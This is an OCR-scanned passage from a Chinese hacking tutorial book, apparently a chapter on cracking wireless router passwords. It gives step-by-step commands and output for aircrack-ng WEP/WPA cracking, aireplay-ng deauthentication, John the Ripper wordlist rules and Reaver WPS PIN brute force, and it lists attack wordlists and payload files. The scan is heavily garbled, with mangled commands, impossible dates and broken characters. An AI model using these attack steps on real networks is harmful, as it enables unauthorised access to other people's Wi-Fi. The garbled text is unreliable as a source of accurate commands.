-rw-r--r-- 1 root root 401K 3 月 25 2018 megabeast.txt 
cH 1 ][ Elapsed: 34 mins ][ 2918-19-18 02:67 ][ 149 bytes keystream: 1C:FA:658:01:2F:08 -rw-r--r-- 1 root root 244 3 月 25 2018 mutations commcn,. txt 
BSSID PWR RXQ Beacons #0ata, #/s CH MB ENC CIPHER AUTH ESSID -MwW-r--r-- 1 root root 2.1K 3 月 25 2918 spanish.txt 
-rw-r--r-- 1 root root 79 3 月 25 2018 test.txt 


1C:FA:68:91:2F:98 8 54 1239B 144526 8 1 S4e. WEP WEP SKA Test-6991 


BSSID STATION PWR Rate Lost Frames Probe 


(3) /usr/share/wfuzz/wordlist/Injections 
lC:;FA;68;01;2F:;88 E8;4E;g6;28;AE:46 日 8- 1 g 1319964 


1C:FA:68:61:2F:98 DC:6D:CD:66:FE:CB -2 le-56 g 3194 Test-661 目录 下 的 字典 文件 ， 如 下 图 所 示 。 
使 用 aircrack-ng 工 具 破 解 密 码 该 root@kali:/usr/share/wfuzz/wordlist/Injections# ls -Lah 


总 用 量 40K 
root root 4.0K 16 月 8 00:58 . 


黎 码 为 KEY FOUND! 人 KEY FOUND1! 后 ratte root root 4.0K 8 月 21 06:52 


drwxr-xr-x 


2 
8 
es 吾 /3 了 > -rw-r--r-- 1 root root 11K 3 月 25 29018 ALL _ attack.txt 
面 方 括 巨 中 是 窗 码 的 十 六 进 制 形式 ， 之 后 -rw-r--r-- 1 root root 59 3 月 25 2618 bad chars .txt 
1 
1 
1 
1 


,le > > -rw-r--r-- root root 1.6K 3 月 25 2618 SQL.txt 
ASCII: 后 面 便 是 常 用 的 字符 串 移 码 ， 如 下 -rw-F--F-- root root 3.4K 3 月 25 2018 Traversal .txt 
二 -rw-F--F-- root root 1.5K 3 月 25 2018 XML.txt 
图 所 示 。 -rw-r--r-- 1 root root 2.4K 3 月 25 2918 XSS.txt 
(4) /usr/share/wfuzz/wordlist/others 日 
[88:860:88] Tested 511 keys (got 142782 IVs) 录 下 的 字典 文件 ， 如 下 图 所 示 。 


KB depth byte(vote) 


0 4/ 7 5D(157446) 28(155648) 58(155392) BC(154368) BE(154112) root@kali:/usr/share/wfuzz/wordlist/others# ls -lah 

1 2/ 1 76(159488) ED(156928) 53(156672) D2(156416) 796(155136) 总 用 量 72K 

2 @/ 1 96[199168) 27(158976) 92(158976) 7C(157696) B}1(157184) 

3 59/ 3 F6(147456) 29(146944) 3E(146944) 65(146944) 68(145944) drwxr-xr-x 2 root root 4.6K 16 月 8 99:58 . 

4 2/ 5 AnA5(166696) 5B(159488) C4(158976) 3C(156416) 64(155648) drwxr-xr-x 8 root root 4.6K 8 月 21 966:52 

KEY FOUND! [ 31:32:33:34:35:36:37:38:39:39:31:32:33 ] (ASCII: 1234567899123 ) -rw-r--r-- 1 root root 418 3 月 25 29018 common pass.txt 
Hecrypt ed correcem Te -rw-r--r-- 1 root root S59K 3 月 25 2018 names .txt 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


(5) /usr/share/wfuzz/wordlist/stess 目录 下 
的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/stress# Ls -Lah 

总 用 量 184K 

drwxr-xr-x 2 root root 4.9K 16 月 8 00:58 . 

drwxr-xr-x 8 root root 4.9gK 8 月 21 06:52 .. 

root root 189 3 月 25 2018 alphanum case extra.txt 


-TW-r--r-~- 1 

-rw-r--r-- 1 root root 124 3 月 25 2018 alphanum case.txt 
-rw-r--r-- 1 root root 52 3 月 25 2018 char.txt 
-rw-r--r-- 1 root root 1.5K 3 月 25 29018 doble uri hex .txt 
-rw-r--r-- 1 root root 155K 3 月 25 2018 test ext.txt 
-rw-r--r-- 1 root root 1.0K 3 月 25 29018 uri hex.txt 


(6) /usr/share/wfuzz/wordlist/webservic- 
es 目录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/webservices# ls -Lah 
总 用 量 16K 

drwxr-xr-x 2 root root 4.0K 10 月 8 00:58 ， 

drwxr-xr-x 8 root root 4.0K 8 月 21 06:52 .. 

-rw-r--r-- 1 root root 453 3 月 25 2018 ws-dirs.txt 


-rw-r--r-- 1 root root 111 3 月 25 2018 ws-files.txt 


(7) /usr/share/wfuzz/wordlist/vulns 目录 
下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/vulns# ls -Tah 
总 用 量 446K 

drwxr-xr-x 2 root root 4.0K 16 月 8 60:58 . 
drwxr-xr-x 8 root root 4.0K 8 月 21 06:52 .,.， 


-rw-r--r-- 1 root root 230 3 月 25 2918 apache.txt 
-rw-r--r-- 1 root root 1l08k 3 月 25 2018 cgis.txt 

-rw-r--r-- 1 root root 706 3 月 25 2918 coldfusion.txt 
-rw-r--r-- 1 root root 74K 3 月 25 2918 dirTraversal-nix.txt 
-rw-r--r-- 1 root root 71k 3 月 25 29]18 dirTraversal.txt 
-rw-r--r-- 1 root root 72K 3 月 25 2918 dirTraversal-win.txt 
-rw-r--r-- 1 root root 3.1K 3 月 25 2918 domino.txt 
-rw-r--r-- 1 root root 15Kk 3 月 25 2918 fatwire pagenames .TXT 
-rw-r--r-- 1 root root 863 3 月 25 2918 fatwire.txt 
-rw-r--r-- 1 root root 383 3 月 25 290]18 frontpage.txt 
-rw-r--r-- 1 root root 485 3 月 z5 290158 115S.TXT 

-rw-r--r-- 1 root root 365 3 月 25 2018 iplanet.txt 
-rw-r--r-- 1 root root 306 3 月 25 2918 jrun.txt 

-rw-r--r-- 1 root root 155 3 月 25 2918 netware.txt 
-rw-r--r-- 1 root root 295 3 月 25 2918 oracle9i.txt 
-rw-r--r-- 1 root root 16K 3 月 25 29018 sharepoint. txt 
-rw-r--r-- 1 root root 571 3 月 25 2918 sql inj.txt 
-rw-r--r-- 1 root root 979 3 月 25 2918 sunas.txt 

-rw-r--r-- 1 root root 220 3 月 25 29018 tests.txt 

-rw-r--r-- 1 root root 1.8K 3 月 25 2918 tomcat.txt 
-rw-r--r-- 1 root root 536 3 月 25 2918 vignette.txt 
-rw-r--r-- 1 root root 2.4K 3 月 25 2918 weblogic.txt 
-rw-r--r-- 1 root root 7.4K 3 月 25 2918 websphere.txt 


(8) /usr/share/wordlist 目录 下 的 字典 文 
件 ， 如 下 图 所 示 。 


root@kali; /usr/share/wordlists# ls -lah 


FWXr"Xr "xX Z root root 4,6K 8 月 21 60;52 

FWXr-xr-x 448 root root 16K 19 月 13 64:50 

Lrwxrwxrwx 1 root root 25 8 月 21 86:52 dirb -> /usr/sha 

Nrwxrwxrwx 1 root root 39 8 月 21 96;52 dirbustor -» /usr/share/dirbuster/wordlists 

Lrwxrwxrwx 1 root root 35 8 月 21 66:52 dnsmop, txt -> /usr/shaorc/dnsnop/wordlist TLAS.txt 

Nrwxrwxrwx 1 root root 41 8 月 21 66:52 fasttrack, txt * > /ysr/share/set/src/fasttrack/wordlist, txt 

Lrwxrwx rwx 1 root root 45 8 21 860:52 fern-wifti -> /usr/share/fern-wifi-cracker/extras/wordlists 

NN rw rwx rx 1 roor roor 46 8 月 71 66:52 Horasploit -> /usr/share/merasplolrt. frAamework/dara/wordlists 

Lrwxrwxrwx 1 root root 41 8 月 21 86:52 hnap.LsT -> /usr/share/nnmap/nselib/data/passwords. Lst 

-FW-r--r-- 1 root root 51M 3 月 3 2613 rockyou .txt.9z 

Thee 1 root root 34 6 月 21 66:52 sqlmap, txt -> /usr/sharc/sqlnap/txt/wordlist ,txt 
[mb ] root root 25 8 月 2) 00;52 wfuzz -> /usr/share/wfuzz/wordlist 


(9) /usr/share/wordlist 目录 中 有 一 个 压 
缩 文 件 rockyou.txt.gz。 其 中 也 包含 一 个 字 
典 文 件 解 压缩 ， 如 下 图 所 示 。 


root@kali:/usr/share/vwordlists¥# gunzip rockyou.txt.gz 
root@kali:/usr/share/wordlists# ls 

dirb dnsmap .txt fern-wifi nmap.lst sqlmap .txt 
dirbuster fasttrack.txt metasploit rockyou.tXxt wfuzz 
root@kali:/usr/share/wordlists# cat rockyou.txt | wc -1 
14344392 


2. 破解 WPA 密 码 
破解 文件 之 前 ， 首 先 需要 设置 无 线路 
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由 器 的 加 密 方式 ， 设 置 方法 为 : 前 先 登 
录 无 线路 由 器 ， 在 “无 线 设 置 ” 中 将 “无 
线 安全 设置 ”设置 成 WPA 加 密 ， 如 下 图 
所 示 。 修 改 加 密 方式 后 需 重 局 路 由 才能 
生效 。 


到 WPA-PSK/WPA2-PSK 


iE 
加 密 算 法 : 
vse: 


(8-3 个 SCII 码 字符 或 8-64 个 十 六 进 制 字符 ) 
所 
(单位 为 种 ， 最 小 值 为 90， 不 更 新 则 为 0) 
破解 WPA 密 码 的 具体 操作 步骤 如 下 : 
使 用 airmon-ng strat wlan0 命 令 启 动 网 
卡 并 进入 monitor 模 式 ， 如 下 图 所 示 。 


roote@kali:~# alrmon-ng start wlane 


PHY Interface Driver Chipset 


phyl wlan9 rt2896USb Ralink Technology, Corp. RT287B/RT38@70 


(mac8b211 monitor mode vif enabled for {phyljwlan® on [phyljwlLanemon) 
(mac88211 station mode vif disabled for [phyl]jwLang6) 


使 用 airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 
Wlan0mon 命 令 ， 启 动 数据 抓 包 功 能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


cH 1 ][ Elapsed:; 1 min ][ 2618-19-186 23:;27 

BSSID PWR RxQ Beacons 考 Data， 考 /5 CH MB ENC CIPHER AUTH ESSID 
l1C:FA:68:01:2F:08 1 53 459 16 9 1 2796 WPA2 CCMP PSK Test-0901 
BSSID STATION PWR Rate Lost Frames Probe 
1C:FA:68:01:2F:@8 DC:6D:CD:66:FE:CB 1 @ -6 1 21 


如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


root@kali:-~# aireplay-ng -0 1 -a 1C:FA:68:B1:2F:68 -C DC:6D:CD:66:FE:CB wlanemon 
64:15:96 Waiting for beacon frame (BSSID: 1C:FA:68:61:2F:88) on channel 1 
04:15:867 Sending 64 directed DeAuth (code 7}. STMAC: {DC:6D:CD:66:FE:CB8] [ 98|55 ACKS] 


当 抓 取 到 AP 与 STA 关 联 时 的 四 次 握手 
信息 ， 下 图 会 给 出 相应 的 提示 信息 。 


CH 1 ][ Elapsed: 3 mins ][ 2018-10-18 23;:36 ][ WPA handshake: 1C:FA:68:0]1:;2F:08 


BSSID PWR RXN0 Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
1C:FA:68:01:2F:08 1 39 1116 83 2 1 270 WPA2 CCMP PSK Test-901 
BSSID STATION PWR Rate Lost Frames Probe 


1C:FA:68:01:2F:88 DC:6D:CD:66:FE:CB 9 


使 用 aircrack-ng -w < 字典 文件 > 
wpa-01.cap 命 令 ， 即 可 破解 出 WPA 密 码 ， 如 
下 图 所 示 。 可 以 看 到 每 秒 筛选 2174 个 密码 
文件 ， 如 果 字 典 中 存在 密码 文件 一 定 会 破 


le- Be 1912 92 Test-661 


解 出 来 ， 这 里 获取 的 密码 为 Password。 


[66:60:00] 172/647 keys tested (2174.05 k/s) 


Time left: 0 seconds 26.58% 


KEY FOUND! [ Password | 


Master Key : 82 94 JA F8 6C 35 F6 53 DD QF 7F 06 4A 46 17 AB 


D1 43 4A 74 D1 42 39 QQ 6 26 69 5C D5 B7 BD 17 


: 51 FB B2 7C FA 7B 1]F 8D ES B4 47 12 ED 6B QA 68 
46 69 45 F9 E9 15 lB EA 45 34 D3 D2 E9 6F DC 2E 


Transient Key 


FB 9A FE 82 50 92 77 D5 F1 94 89 00 B09 609 QQ @0 
80 860 06 80 00 09 O00 O90 606 66 60 09 69 00 99 OQ 


EAPOL HMAC : 3E 78 E2 FA C6 9D 53 78 FO 95 8F F7 EC 7C 7B A2 


8.3.3 ”使 用 厢 R 工 具 破 解 WPA 密 码 


JITR (John the Ripper) 是 一 个 快速 的 
密码 破解 工具 ， 用 于 在 已 知 密 文 的 情况 下 
尝试 破解 出 明文 的 密码 软件 ， 支 持 目 前 大 
多 数 的 加 密 算法 。 

使 用 JTR (John The Ripper) 破解 密码 
的 操作 步骤 如 下 : 
打开 配置 文件 并 搜索 List.Rules: 
Wordlist 字 段 ， 如 下 图 所 示 。 

# Wordlist mode rules 


[List.Rules:Wordlist] 
# Try words as they are 


# Lowercase every pure alphanumeric word 
-C >3 I?X10 

需 CapitatLize every pure alphanumeric word 
-C (?a >2 !?3X CQ 


调整 到 ListRules:Wordlist 字 段 的 结尾 
处 ， 加 入 “$[0-9] $[0-9] $[0-9] $[0-9]” 字 
段 ， 如 下 图 所 示 ， 这 样 便 可 以 修改 客 码 生 
成 规则 。 

-[:c] <* >2 !?A \pl[\lc] M [PI] Q 

# Try the second half of split passwords 

-S X** 

-S-C x*+* M1NQ 

$[0-9]$[0-9]$[0-9]$[0-9] 

# Case toggler for cracking MD4-based NTLM hashes 
# given already cracked DES-based LM hashes. 


# Use --rules=NT to use this 
[List.Rules:NT] 


使 用 john --wordlist=< 窗 码 文 件 > 
--rules --stdout 命 令 ， 可 以 通过 相应 的 规则 
生成 窗 码 ， 如 下 图 所 示 。 其 中 --wordlist 有 是 
读 取 窗 码 文 件 ; --rules 对 该 文件 使 用 规则 ; 
--stdout 进 行 显示 。 
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root@kali:-~# john --wordlist=dd.txt --rules --stdout 
1550992 
1500992 
1301234 
1321234 


4p 0:90:00:0906 1096.60695 (2918-10-19 95:14) 46.09p/S 1321234 


使 用 john --wordlist=dd.txt --rules 
--Sstdout | alrcrack-ng -e Test-001 -w - wpa-01.cap 
命令 ， 配 合 aircrack-ng 进 行 密码 破解 。 下 图 
为 执行 效果 ， 可 以 看 出 黎 码 为 Password666。 


[890:60:06] 4 keys tested (21.53 k/s) 


Current passphrase: Password666 


Master Key : AB 3D B3 21 F4 B6 8F 097 7D CE 6E E9 33 75 4E 98 
66 34 78 63 4B EA 7D A@ DA F9 A4 95 81 18 76 6B 


: E1 D9 12 9A 16 34 8D 26 73 D4 38 AE BB BD 1E 93D 
BB 53 E7 DD 85 81 Fy 28 C9 87 36 63 AB 41 65 03 
59 75 9D 96 68 69 3F 81 BB 5F 28 55 86 5B 3C FA 
OA F4 F5 F4 CC AE 64 FD 3E 3E 58 1A 8D E8 DC 3B 


Transient Key 


EAPOL HMAC : 93 46 62 15 49 1F 11 48 QE A5 9A 08 F2 4C 72 42 


Passphrase not in dictionary 


8.3.4 使 用 Reaver 工 具 破 解 WPS 密 码 


工具 ， 它 主要 针对 的 是 WPS 漏 洞 。Reaver 
工具 会 对 WiFi 保 护 设置 (WPS) 的 注册 PIN 
码 进行 暴力 破解 攻击 ， 并 尝试 恢复 出 WPA/ 
WPA2 密 码 。 

使 用 Reaver 工 具 破 解密 人 码 的 操作 步 又 
如 下 : 


使 用 reaver 命 令 ， 查 看 reaver 工 具 的 帮 
助 信息 ， 下 图 为 所 需 参数 。 


root@kali:~# reaver 


Reaver v1.6.5 WiFi protected Setup Attack Tool 
Copyright (c) 2811, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol .com> 


Required Arguments: 


-i, --interface=<wlan> 
-b, --bssid=<mac> 


将 网 卡 设 置 成 monitor 模 式 ， 寻 找 支 
持 WPS 的 AP， 使 用 wash -U -i wlan0mon 命 
令 。 下 图 为 执行 效果 。 其 中 -U 是 表示 以 
UTF-8 字 符 编 码 进 行 显示 ，-i 是 具体 使 用 的 
网 卡 接 口 。 


root@kali:-# wash -U -i wlandmon 

BSSID ch dBm WPS Lck Vendor ESSID 
42:31:3C:E1:D9:69 9 -59 No RalinkTe 小 米 共 享 wiFi D668 
64:95:E6:12:CA:21 11 -57 No Broadcom Chinanet-KTJK9F 
AC:A2:13:85:FC:C9 4 -59 No RalinkTe lfwx 


Name of the monitor-mode interface to Use 
BSSID of the target AP 


A8:57:4E:C7:F8:74 11 -57 Unknown wangyangyang 
28:2C:B2:EA:D5:54 11 -61 No “ Unknown TP-LINK EAD554 
40:A5:EF:67:85:A2 1 -59 NO 主 接 93-1 


DC:C6:4B:Cl:B3:5C 8 -61 
38:E2:DD:74:Al:AA 4 -61 


No RalinkTe ChinaNet-TKae 
No RalinkTe ChinaNet-nkkk 


NPNNNNNN 
ODOOAOOOO@ 
本 
© 
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Reaver 工 具 是 目前 流行 的 无 线 网 络 攻击 名 汶 熙 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈 超 值 版 ) 


(多 提示 : 还 可 以 使 用 airodump-ng 这 个 工具 
来 寻找 支持 WPS 的 AP， 使 用 airodump-ng 一 
wps wlan0mon 命 令 ， 同 样 可 以 寻找 到 支持 
WPS 功 能 的 AP， 下 图 为 执行 效果 。 


[root@kali:;-# airodump-ng --wps wlangmon 


cH 5 ][ Elapsed: 30 s J[ 2018-16-26 69:55 


ES55SID FWR Beacons #0aTa, #/5 CH MB ENC CIFPHER AUTH WP5 E55ID 
DB6:03:CD:33:66:73 -9 5 了 0D 0 6 495 OPN TPGuest 6073 
F4:83:CD:;33:60:73 26 37 9 9 5 465 WPA2 CCMP PSK 于 技 
lC:FA:68:01:2F:08 -30 1 9 9 1 270 MPA2 CCMP PSK 9.9 Test -091] 
E4:68: 上 3:7C:B1I:BB -36 2 8 9 6 Sde. WPA2 CCMP MGT CMCC 
F4:68:A3:7r:R1:B2 -36 3 [3 [J 6 S54e. OPN CMCC-X] 
E4:68:A3:7C:B1:B5 -36 一 B 8 6 S54e. OPN 训 
E4:68:A3:7C:B1:B1 -38 3 [a 8 6 Si4e. OPN and-Business 
E4;68;A3;7C;EF;F5 -39 3 8 9 1 S54e, OPN 08.0 
E4:68:A3:7C:EF:F2 -46 EF. 9 9 1 S54e. OPN 6.6 CMCC-X] 


破解 PIN 码 ， 使 用 reaver -1 wlan0mon 
有 也 

-b <AP-MAC 地 址 > -vv -c 3 命令 ， 其 中 -vv 是 

显示 详细 信息 ，-c 选 择 信道 ， 如 下 图 所 示 。 

和 jd ™、 a » ss 

每 次 随机 选择 一 个 PIN 码 进行 发 送 。 

[+] Trying pin "33335674" 

[+] Sending authentication request 

[+] Sending association request 

[+] Associated with 1C:FA:68:81:FB:EA (ESSID: TP-LINK 81FBEA) 

[+] Sending EAPOL START request 

[+] Received identity request 

[+] Sending identity response 

[+] Received M1 message 

[+] Sending M2 message 

[+] Received M3 message 

[+] Sending M4 message 

[+] Received WSC NACK 


[+] Sending WSC NACK 
[+] 0.05% complete @ 2018-11-04 23:55:33 (28 seconds/pin) 


局 提示 ， 在 丰 解 的 过 程 中 ， 如 果 加 入 1 


获取 到 PIN 码 后 ， 可 以 通过 PIN 码 获 
取 窗 码 ， 这 时 可 以 使 用 reaver -i wlan0mon 
-b<AP-MAC 地 址 > -vv -p <PIN 码 > 命令 来 获 
取 黎 码 ， 这 里 获取 的 客 码 为 Password， 如 下 
图 所 示 。 


[+] Received MI message 

+] Sending M2 message 

+] Received M3 message 

+] Sending M4 message 

+] Received M5 message 

+] Sending M6 message 

+] Received M7 message 

+] Sending WSC NACK 

+] Sending WSC NACK 

+] Pin cracked in 4 seconds 
+] WPS PIN: '35169857， 

+] WPA PSK: 'Password' 

+] AP SSID: 'TeSst-001， 

[+] Nothing done, nothing to save. 


a 8.4 ”使 用 CDlinux 系 统 破 解 无 


线路 由 大 密码 


CDlinux 系 统 中 自 带 有 许多 破解 工具 ， 
如 mimidwep-gtk、FeedingBottle、Inflator 
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等 ， 使 用 这 些 工具 可 以 破解 无 线路 由 器 的 
密码 。 


8.4.1 使 用 minidwep-gtk 破 解 WEP 
密码 
使 用 minidwep-gtk 破 解 WEP 密 人 码 需 要 以 
下 几 个 步骤 


双击 CDlinux 虽 面 minidwep-g 红 图 标 ， 
如 下 图 所 示 。 


启动 minidwep-gtk 首 先 会 弹出 一 个 警 
yoy 如 下 图 所 亏 示 。 赔 读 完 警告 信 自 、 
后 单 去 OK 按钮。 


1 


本 软件 是 家 用 无 线路 由 句 安 全 审计 之 工具 
切 勿 用 于 非法 行为 

盗用 他 人 无 线 网 络 涉嫌 违法 

丢弃 WEP 加 密 ， 使 用 WPA2 加 密 
关闭 路 由 WPS 


下 图 为 启动 后 的 minidwep-gtk， 左 侧 
的 “无 线 网 卡 ” 中 可 以 看 到 接 入 的 无 线 网 
“信道 ”可 以 选择 对 那 种 信道 进行 扫 
描 ; “加 窗 方 式 ” 可 以 选择 针对 哪 种 加 窗 方 
式 进 行 破解 。 


无 线 网 卡 路 由 MAC 名 称 强度 信道 ”加 窄 方式 客户 饭 MAC 
| ” 
wian0 5 扫 扬 
wlanO Ralink 
RT2870V3070 rt2800usb 
[phyo] 
信道 D 沟 闻 元 
All wv 
加 劾 方式 L 启 动 
WPA/WPA2 Iw 
: FEE2Z Reaver 
ee 11:06:22 一 寺 待 局 令 中 
rcplay-ne -4 
wv Aircpl NE =5 A 停止 
replay-r 
replay-ne 
E 退 出 
排序 pin 码 
IJVS 歼 量 : 


(多 注意 : 如 果 “ 无 线 网 卡 ” 中 没有 检测 到 
无 线 网 卡 ，minidwep-gtk 软 件 会 给 出 提示 ， 
此 时 可 以 检查 无 线 网 卡 是 否 插入 并 可 用 。 


切换 加 密 方式 为 WEP 并 单 击 “ 扫 描 ” 
和 右 果 后 会 给 出 详细 信息 ， 如 


无 线 网 卡 路 由 MAC 名 称 强度 信道” 加密 方 式 客户 端 MAK 


wlan0 上 二 国 1C,FA'68:012F08_Testoo1 -127 1 WEP_DC'6D:CD'66'FE'CB_ 


S$ 扫描 
Wand Ralink 
RT287073070 rt2800usb 


~ lphy0] 


信道 
All Be 
加 密 方 式 i ] 
WEP iv 
-方式 选择 一 一 一 一 一 i 
| Aireplay-ne -2 
区 Alreplay-ng -3 11:12:43--> 等 待命 令 中 
[| Mireplay-ne "4 


| Aireplay-ne -5 A 停止 

[DJ Mreplay-ng -6 
[ | Aireplay-ne -了 

500 Iw 


IV5 数 量 ; 0 


单 击 “ 启 动 ”按钮 ， 此 时 minidwep-gtk 
会 调用 aireplay-ng 打 断 客户 端 与 AP 之 间 的 连 
接 ， 抓 取 有 效 连 接 信息 并 开始 重 放 数据 包 ， 
此 时 IVs 数 量 会 不 断 增 加 ， 在 IVs 数 量 增加 的 
同时 minidwep-g 红 党 试 进行 破 解 筑 码 ， 如 下 
图 所 示 ， 破 解 出 禾 码 后 会 给 出 提示 。 


无 线 网 卡 路 由 NMAC 名 称 强度 信道 ”加密 方 式 客户 端 MAKC 
wlan0 Db 1CFAG8:01:2F:08_Test-001__-106_1_ WEP_ mn 
orp | > 扫 拍 
RT287073070 rt2800usb 
- |phyg] 
信道 
All Bd 
加 密 方 式 启动 
WEP = _ 
A Neplyre 2 百 
加 Aireplayng -3 15.3922-->Aireplay-ng -2 -p 0841 成 功 ,开始 注入 .. 一 
门 Aireplay-ne -4 15:39:16-> 尼 动 aireplay-ng -5 
四 Mreplay.ng -5 15:39:16--> 启 动 aireplay-ng -3 2 停止 
OD ee 15:39:16--> 尼 动 aireplayng -2 -p 0841 
注入 速率 15:39:16--> 著 到 一 个 客户 问 MAC:DC:6D:CD:56:FE:CB 一 E 运 出 
500 和 IVs 致 量 : 76 


8.4.2 ”使 用 minidwep-gtk 和 破解 WPA/ 
WPA2 密 码 
使 用 minidwep-gtk 破 解 WPA/VWPA2 密 码 
需要 以 下 几 个 步骤 : 
局 动 minidwep-gtk 并 将 加 客 方 式 调整 为 
WPA/WPA2 方 式 并 局 动 扫描 ， 如 下 图 所 示 。 


nm 


无 线 网 卡 路 由 MAC 名 称 ”强度 ”信道 ”加密 方式 客户 澳 MAC 
wlan0 Da F4:s3:cD:33:60:73_ 风 .从 四 四 . 国 .. -113 6 WPa2WPA 目 6 扫描 
Wland Ralink -FA-GB-D1-2F- "6D: 、 和 
os 1C:FA-6B:01:2F:0B_Test-001_ -B86 1 WPA2WPA_DC:6D:CD:56:FE:CB_ 
- [phyo] 04.95:E6:12:CA:21_Chinanet-KTJK9F__ -62_11 WPA2WPA__ wps 
信道 _ 74:7D:24:26:E6:00_xywj__-62_ 10_ WPA2__ D 路 字 奥 
All [ww ACT74.09:EA3122_DQzYY -62_ 6 WPA2 ES 
EC-26CA:Add8:C2_TP-LINK 43C2 _ -62 __11 WPA2WPA 
”加 密 方 式 一 PUNK-48C2 一 6 一 1 一 一 国 | | 
WPA/WPA2 | 1A"TSQAMR2TNAT hanshirhi! -Al 11 WPA7WPA Be 
J OE 
- 广 入 这 泽 一 一 一 一 一 | 
四 Aireplay.ng -2 Reaver 
四 Aireplay'nge "了 18;24.21-> 等 待命 邻 中 
[DL] Areplay-ng "d 
四 Aireplaynp -5 A 停 止 
DOD Aireplay-ne -5 pd 
口 Aireplay-ng =7 
上 退出 
排序 pin 码 


IVS 致 量 :0 


第 8 章 无 线路 由 器 的 密码 安全 策略 一 人 


选择 需要 破解 的 AP 单 击 “ 启 动 ” 按 
钮 ， 一 单 获取 到 握手 包 信 息 minidwep-gtk 会 
给 出 提示 ， 如 下 图 所 示 。 


Lond minidwep-gtk-30513-fine 
刻 线 网 未 路 出 MAC 名 和 咏 腊 1 送 几 加 床 方 二/ 客户 的 MAEG 
| 
wlan0 Iv | 目 Se 
3S 扫 拍 
Wianm0 Ralink | 了 a x = = 
RT287W307D rt2800usb | 
~ lphyo] 
a D 忠 字 帕 
车 洛 D 
All > | 
加 宗方 式 L 启 动 
WPA/WPA2 | 
方式 将 拌 
加 Aireplay,. na -2 Keavel 
加 Airenlay- nz -3 | 6 cancel ] or 
| | Aircplay-nz -< | 
Aireplay- na -5 handshake file:/tmp/1C-FA-68-01-2F-08_handshake.cap A 
OD Aireplay- ne -6 18226:21->WPA 提 手包 岳 获 ! l 
TAY | |18:25:51->Wait30seconds for authentication handshake! ") ER 
捧 亡 pin 玛 | ‘| »| 


[ys 歇 更 753 


单 击 OK 按 钮 ， 在 密码 选择 界面 中 选 
择 一 个 密码 ， 如 下 图 所 示 。 


2 = 加 
|Places | | Name v |Size NModified | | 
人 Search 路 minidwep 18-2B 
©@ Recently Used ssh-oTQzqQxp2538 18:22 
BD root 1C-FA-68-01-2F-08 handshake.cap 104.0KB 18:26 
=» Pile System 1C-FA-68-01-2F-08 handshake cap.hccap 392 bytes 18:26 
9 CDLINUX 1C-FA-68-01-2F-08 handshake.cap wkp 2.6KB 18:26 
bash gtk.2748 0bytes 1822 
fcitx-socket-:0 Obytes 18:22 
minidwep essid 529 bytes 2010 年 02 月 02 日 
serverauth.kSgiU7 52 bytes 18:22 
| wordlisLtxt 52MB 2009 年 10 月 09 日 
类 mm E 
6 cancal | ok 


通过 字典 比 对 计算 出 WPA/WPA2 的 密 
码 ， 如 果 字 典 里 存在 密码 一 定 会 破解 出 来 ， 
破解 出 密码 后 会 给 出 提示 ， 如 下 图 所 示 。 


Ld minidwep-gtk-30513-flne 
无 线 网 卡 陪 由 MAC 名 区 强度 ”信和 送 ”加 究 方 式 客户 久 MWAG 
wlan0 v | 1C:FA:68:01:2F°08_Test-001__-127__1__ WPA2WPA_ 四 

一 一 一 一 一 5 扫 白 
Wand Ralink F4:83:CD:33;60:73_ 风 .. 谷 罗 四. 疗 .， -127_ 6 WPA2WPA__ 

RT2870Y307D rt2800usb 

~ lphyo] CB:3A:35:06:68:00_BL| -66 13 WPA2WPA __ 

| 牛 字 睦 


All 所 ] 00.23.B8:06; 


A Essid ‘Test-001 


和 可 方式 DC'C64B:C1 Bssid: 1C:FA:68;01-2F:08 i 
和 WPA KEY: Password = 
WPA/WPA2 bg ] 
- 方 午 先 拌 一 一 一 一 一 i ie ee 
网 Aireplay-nz -2 - tavel 
四 下 repla ns =3 
口 Areplarnz-4 10:02:38->aircrace-ng 已 经 退出 se 
Mreplay ng -3 10:00:11--> 已 启动 aircrack-ng, 扫 妃 宇 谨 中 的 密码 = 
DD Mireplay ng Handshake file for Hashcat:/tmp/1C-FA-68-01-2F-08_handshake.cap.hccal 
Bircplay nz 7 
ds se | Handshake file for EWSA/tMP/IC-FA-G8-01-2F-08 handshake.cap.wkp Il” EiR! 
插 序 pin 强 | 141 | 
IV5 致 熏 ; 650 


8.4.3 使 用 minidwep-gtk 破 解 WPS 密 码 


使 用 minidwep-gtk 破 解 WPS 密 码 需 要 以 
下 几 个 步骤 : 
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启动 minidwep-gtk 并 启动 扫描 ， 如 果 
是 破解 WPS 方 式 的 PIN 码 不 用 关心 加 密 方 
式 ， 在 扫描 出 的 AP 列表 中 ， 如 果 存 在 WPS 
在 其 尾部 会 进 行 标注 ， 如 下 图 所 示 。 


mindwep-gtk-30513-flne ELEa3| 
无 线 网 卡 路 由 MAC 名 和 强度 ”信道 ”加 只 方式 害 户 铝 MAC 
wlan0 vw | | F4:83:CD-33:60:73_ 风 . 欠 鸭 四国-110_ 6_ WPAZWPA_58:00:E3:B9:08:1 1 
5 扫描 
wland Ralink 1C:FA:68;01:2F:08_Test-001 -71_ 1 WPA2WPA wps 
RT2870/307D rr2800usb | 
[phyo) 00:2F:D9:D9:02:FD_ChinaNet-6Wrc_ -65__13__WPA 
车道 1C:60:DE:62:BA:0E_222 -65_13_WPA2__ D 由 字典 
All w= | | 00:2F:D9.D7:FB:0D_ChinaNet-TWnr -63_ 13_ WPA__ 
, 70:AF:5A091E:9D_TP794613852 -61_13 WPA2 
加 密 方 式 9 [启动 
6b8:DB:54:31:BE:27_@PHICOMM 25 60_ 4 WPA2 ™ my 
WPA/WPA2 - ' 
| 
~ Reaver || 
7 11:01:07--> 等 待 辣 令 中 
